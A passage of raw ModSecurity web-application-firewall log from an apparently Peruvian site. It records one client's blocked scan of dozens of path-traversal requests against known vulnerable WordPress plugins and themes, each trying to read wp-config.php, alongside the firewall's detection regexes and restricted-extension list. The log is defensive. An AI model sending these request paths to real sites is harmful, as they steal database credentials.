.sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y0ZyB-LrJ0tgpRmNRAaIKQAAANA"] [Wed Oct 12 02:51:35.955834 2022] [:error] [pid 22339:tid 140534349756160] [client 185.189.115.30:50644] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Y0ZyB9mZws0mEkXxGo-VpwAAAJU"] [Wed Oct 12 02:52:39.911171 2022] [:error] [pid 22337:tid 140534580840192] [client 185.189.115.30:50876] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "Y0ZyR6BKlkjFPqrcdjM38AAAAAI"] [Wed Oct 12 02:52:40.061852 2022] [:error] [pid 22972:tid 140534332970752] [client 185.189.115.30:50878] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "Y0ZySOLrJ0tgpRmNRAaIVAAAANc"] [Wed Oct 12 02:52:41.046884 2022] [:error] [pid 22972:tid 140534383326976] [client 185.189.115.30:50882] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "Y0ZySeLrJ0tgpRmNRAaIVgAAANE"] [Wed Oct 12 02:52:45.185112 2022] [:error] [pid 22338:tid 140534425290496] [client 185.189.115.30:50896] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/force-download.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/force-download.php"] [unique_id "Y0ZyTWINFIoIk7hPzpaZeQAAAEw"] [Wed Oct 12 02:52:46.130086 2022] [:error] [pid 22337:tid 140534391719680] [client 185.189.115.30:50902] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/mdocs-posts/"] [unique_id "Y0ZyTqBKlkjFPqrcdjM39AAAABA"] [Wed Oct 12 02:52:49.136179 2022] [:error] [pid 22337:tid 140534366541568] [client 185.189.115.30:50910] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "Y0ZyUaBKlkjFPqrcdjM39wAAABM"] [Wed Oct 12 02:52:50.140275 2022] [:error] [pid 22337:tid 140534475646720] [client 185.189.115.30:50914] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "Y0ZyUqBKlkjFPqrcdjM3-AAAAAY"] [Wed Oct 12 02:52:50.290947 2022] [:error] [pid 22339:tid 140534349756160] [client 185.189.115.30:50916] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "Y0ZyUtmZws0mEkXxGo-VwAAAAJU"] [Wed Oct 12 02:52:50.442203 2022] [:error] [pid 22972:tid 140534349756160] [client 185.189.115.30:50918] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y0ZyUuLrJ0tgpRmNRAaIXAAAANU"] [Wed Oct 12 02:52:51.450168 2022] [:error] [pid 22339:tid 140534442075904] [client 185.189.115.30:50924] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "Y0ZyU9mZws0mEkXxGo-VwQAAAIo"] [Wed Oct 12 02:52:51.601076 2022] [:error] [pid 22339:tid 140534475646720] [client 185.189.115.30:50926] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "Y0ZyU9mZws0mEkXxGo-VwgAAAIY"] [Wed Oct 12 02:52:51.751950 2022] [:error] [pid 22339:tid 140534324578048] [client 185.189.115.30:50928] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-includes/plugins/wp-mobile-detector/resize.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-includes/plugins/wp-mobile-detector/resize.php"] [unique_id "Y0ZyU9mZws0mEkXxGo-VwwAAAJg"] [Wed Oct 12 02:52:51.903479 2022] [:error] [pid 22339:tid 140534572447488] [client 185.189.115.30:50930] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "Y0ZyU9mZws0mEkXxGo-VxAAAAIM"] [Wed Oct 12 02:52:52.057491 2022] [:error] [pid 22972:tid 140534597625600] [client 185.189.115.30:50932] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..-%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y0ZyVOLrJ0tgpRmNRAaIXgAAAMA"] [Wed Oct 12 02:52:52.210275 2022] [:error] [pid 22337:tid 140534597625600] [client 185.189.115.30:50934] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y0ZyVKBKlkjFPqrcdjM3-gAAAAA"] [Wed Oct 12 02:52:52.361260 2022] [:error] [pid 22338:tid 140534467254016] [client 185.189.115.30:50936] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "Y0ZyVGINFIoIk7hPzpaZewAAAEc"] [Wed Oct 12 02:52:52.513073 2022] [:error] [pid 22972:tid 140534324578048] [client 185.189.115.30:50938] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "Y0ZyVOLrJ0tgpRmNRAaIXwAAANg"] [Wed Oct 12 02:52:52.679082 2022] [:error] [pid 22338:tid 140534400112384] [client 185.189.115.30:50940] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y0ZyVGINFIoIk7hPzpaZfAAAAE8"] [Wed Oct 12 02:52:52.830435 2022] [:error] [pid 22338:tid 140534341363456] [client 185.189.115.30:50942] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "Y0ZyVGINFIoIk7hPzpaZfQAAAFY"] [Wed Oct 12 02:52:52.991732 2022] [:error] [pid 22972:tid 140534484039424] [client 185.189.115.30:50944] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "Y0ZyVOLrJ0tgpRmNRAaIYAAAAMU"] [Wed Oct 12 02:52:53.143674 2022] [:error] [pid 22972:tid 140534400112384] [client 185.189.115.30:50946] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data 